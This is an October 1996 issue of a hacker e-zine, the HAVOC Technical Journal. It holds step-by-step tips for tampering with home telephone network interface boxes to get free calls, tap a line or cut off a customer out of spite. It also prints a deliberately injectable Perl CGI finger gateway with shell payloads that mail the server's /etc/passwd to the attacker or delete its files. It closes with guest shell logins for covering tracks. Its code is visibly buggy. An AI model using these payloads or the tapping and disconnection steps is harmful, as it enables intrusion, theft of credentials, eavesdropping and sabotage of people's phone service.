The HAVOC Technical Journal
Vol. 1 | No.4 | October 1st, 1996 | A HAVOC Bell Systems Publication
"Protected by the First Amendment"
Inside this issue:
Whats new this issue
Editorial
The Network Identification Device Pt. 1
Writting Inscure CGI Progs
The End of penet.fi
ROLL CALL & more!
Next Month
All by Scud-O
Download a copy of issue 4
Go back to the index
(I need more writers!!! e-mail me if ya want to write an article!
my e-mail is: FoxMulder@worldnet.att.net (yes its back up..)
the mags e-mail is: thtj@juno.com (wheee.. we get to read ads as
we get your e-mail!) )
This months music supplied by: Sublime, The Future Sound of London
and Zion Train and Violent Femmes. Oh yea.. and WHFS 99.1 !
What's new in this issue:
Back to the table of contents
Well if you weren't so cheap you would see our nice new format! but
the online version has none of that neatness.. My new school has a
lab with a scanner so the print version should get some nice pics
soon...
Also Scud-O is now on IRC often.. Im on #phreak and #hacker often on
undernet.. to c'mon in and join us for a chat...
If ya want a print version and some extra goodies... e-mail me!
-----------------------------------------------------------
How to contact us:
Check Out Our Web Site:
www.geocities.com/SiliconValley/8805/
my (Scud-O) e-mail is : FoxMulder@worldnet.att.net
our Mag e-mail is : thtj@juno.com
HELLCORE's e-mail is : hellcore@juno.com
---------------------------------------------------------------
Editorial:
Back to the Table of Contents
by Scud-O
Well another month another issue.. but hey if ya had the print version you
would see our nice new format.. its kind of slick... were still messing
around so it can only get better...Welp on to bigger and other things...
lately i've been hit with ALOT of lamers.. (I gots ops on #hacker, thats why)
(sometimes on #phreak as well...) well anyway.. EVERY lamer on #hacker was
like 'teach me' so i relpied 'on what?' they came back with 'everything' so
i said 'get some manuals and RTFM' and they all replied 'what?' .. people
this is PATHETIC!! We need to protect ourselves from these newbies! any
suggestions? e-me: FoxMulder@worldnet.att.net
The Network Identification Device (NID) Pt.1
Back to the Table of Contents
by Scud-O
These days it seems that NIDs have been left unabused when they are a great
device to mess with. Why you ask? Well, there are many things you can to with
them. But first where can you find them? well every house has one! My house
has an old one, but most new ones I see are the size of a sunglass case
which have a 7/16 inch socket screw in them. There are also some bigger ones
( usually in houseing complexes) that have a user opening and a telco opening.
A little history:
The NID was created to for test purposes. The NID is the main
connection from Bell to the houses lines. You can test this NID to see if
Bells lines are fucked or if your lines are fucked. If you live in
Bell Atlantic area, their White Pages have some info on NIDS.
Back to the article:
The NID can be used for many purposes:
1. Free phone calls: Inside the NID there is a jack and a plug. If you unplug
the jack and stick a phone in the plug you can then make calls free of
charge, but the lines restrictions still apply (900 block, call waiting, etc)
To find the line number just use your trusty ANI. And since the jack in the
NID is out, the customer can't interupt you and make a call. Or you can find
a 2 jack to one converter (they sell em in Radio Shack.. its so you can put
more than one phone in a jack) and plug it all together so they can still
make calls.
2. Phone tap: This is just a modification of the 2 to 1 jack converter, just
wait for a call.. you cant leave the phone off the hook.. well because it
will go off the hook... (hmm... maybe next month I'll find out how to be able
to listen 24 hours a day...)
3. Disconnect customer: did some one piss you off? we just open their NID and
unplug the jack and leave... no service... it will take a few days to get
service and they are just totally fucked then... hehehehehehe...
Next Month: read as I steal a NID and slice and dice it!! also: more fun
tricks!
Writting Insecure CGI Progs:
Back to the Table of Contents
by Scud-O
CGI programs really are wonderful.. you can easily give them information
that we shouldn't have!
What follows is a simple CGI prog that you can install to get the servers
password file! The program is actually a finger gateway.. but who cares..
next month or maybe this month I'll print the secure source code to show a
webmaster or sysadmin...
Here's the HTML code:
(NOTE: take out the extra '<'s ! had to do it.. otherwise the
HTML was fucked in this file! )
<
Here's the actual CGI Perl Prog:
#!/usr/local/bin/perl
&parse_form_data(*simple);
$user = $simple{'user'};
print "Content-type: text/plain", "\n\n";
print "Here are the results of your query: "\n";
print '/usr/local/bin/finger $user';
print "\n";
exit (0);
the parse_form_data sub:
(NOTE: ya need this to trasnlater the info for both progs.. other
wise ya fucked! )
sub parse_form_data
{
local(*FORM_DATA) = @_;
local( $request_method, $query_string, @key_value_pairs,
$key_value, $key, $value);
$request_method = $ENV('REQUEST_METHOD');
if ($request_method eg "GET") {
$query_string = $ENV{'QUERY_STRING'};
} elsif ($request_method eg "POST") {
$query_string = $ENV{'CONTENT_LENGTH'};
} else {
&return_error (500, "Server Error',
"Server uses unsupported method");
}
@key_value_pairs = split (/&/, $query_string);
foreach $key_value (@key_value_pairs) {
($key, $value) = split (/=/, $key_value);
$value =~ tr/+/ /;
$value =~ s/%([\dA-Fa-f][\dA-Fa-f])/pack ("C", hex ($1))/eg;
if (defined($FORM_DATA{$key})) {
$FORM_DATA{$key} = join("\0", $FORM_DATA{$key}, $value);
} else {
$FORM_DATA{$key} = $value;
}
}
the return_error sub:
(NOTE: ya need this for the parse sub, and the patched version! )
(NOTE: TAKE OUT THE Extra '<'s below.. had to do it.. otherwise
the HTML in this file was all fucked! )
sub return_error
{
local($status, $keyword, $message) =@_;
print "Content-type: text/html", "\n";
print "Status: ", $status, " ", $keyword, "\n\n";
print << End_of_Error;
<Unexpected Error!
<$keyword
<
$message
Please contact $webmater for more information.
End_of_Error
exit(1);
}
So thats it! below is the patched source:
#!/usr/local/bin/perl
&parse_form_data(*simple);
$user = $simple{'user'};
if($user =~ /[;><&\*'\|]) {
&return_error(500, "CGI Finger Alert", "What are you trying
to do?");
} else {
print "Content-type: text/plain", "\n\n";
print "Here are the results of your query: "\n";
print '/usr/local/bin/finger $user';
print "\n";
}
exit (0);
So what you aske.. we the first one if you type:
; mail -s "passwords!" you@yourdomain.com < /etc/passwd
then you get yourslef a copy of the server's password lists being mailed to
you!
or try:
; rm *
and delete their directory of files!
The End of penet.fi :
Back to the Table of Contents
by Scud-O
Well the pressure was finally too much, as penet.fi will no longer give out
anonymous e-mail. But the people that already have addresses can still send
stuff. But newsgroup post aren't allowed anymore... but you can still get
anon news posts. So what will happen? well I think hacking penet emails will
be fun for a while, but we will all start getting Juno accounts.. the're free
you can forge them, and they are dissposible, but you have to read e-mail,
click thru a list of hobbies, etc, and more and then your e-mails get adds
in them... oh well though...
ROLL CALL & More!
Back to the Table of Contents
Who is HAVOC?
Scud-O : Pope boy
Psycho : Fag Vice Pope
Pinky : In hidding
Rotten : Moving fool
Sid : Other Moving Fool (and the're twins as well! )
Want to join? next month we got a sign up sheet!
Cool People:
|\|\cFill
theLURK7R (sometimes theLURK3R )
JKMG-Boba ( aka Boba)
Alef
all on IRC!
This Month Question:
We ask why has |)eadLoss\Mulder changed his name?
Well.. some knew me as |)eadLoss , some as Mulder, so I
combined the 2.. but people we ever more confused, so I said fuck em!
and I changed it to Scud-O .. Scud-O is a cool guy..
Next Month's Question: Who is Scud-O ?
Next Month:
Back to the Table of Contents
This MANY be what we will have in issue 5
We have more on the NID
Virus Theory Pt.2
More Virus Stuff
RTFM: The lamer Journal
Whats up in the HELLCORE Labs?
Pager Talk
AND MUCH MORE TBA !
Issue 5 is out Oct. 31st!
cya ya next issue! -Scud-O
Wait! we have a bonus:
Some shell accounts to use to cover your ass:
Freenet accounts: login
freenet.buffalo.edu guest
freenet.hsc.colorado.edu guest
heartland.bradley.edu bbguest
freenet.lorain.oberlin.edu guest
freenet.victoria.bc.ca guest
cbos.uc.edu visitor
yfn.ysu.edu visitor
freenet-in-a.cwru.edu fnguest
b
c
------------------------
Okay that is all!
============================================================
= IS this copy of The HAVOC Technical Journal Skunked?
= If this file reads larger than 11078 bytes than this issue
= has been messed with! get a fresh copy from our site:
= www.geocities.com/SiliconValley/8805/
============================================================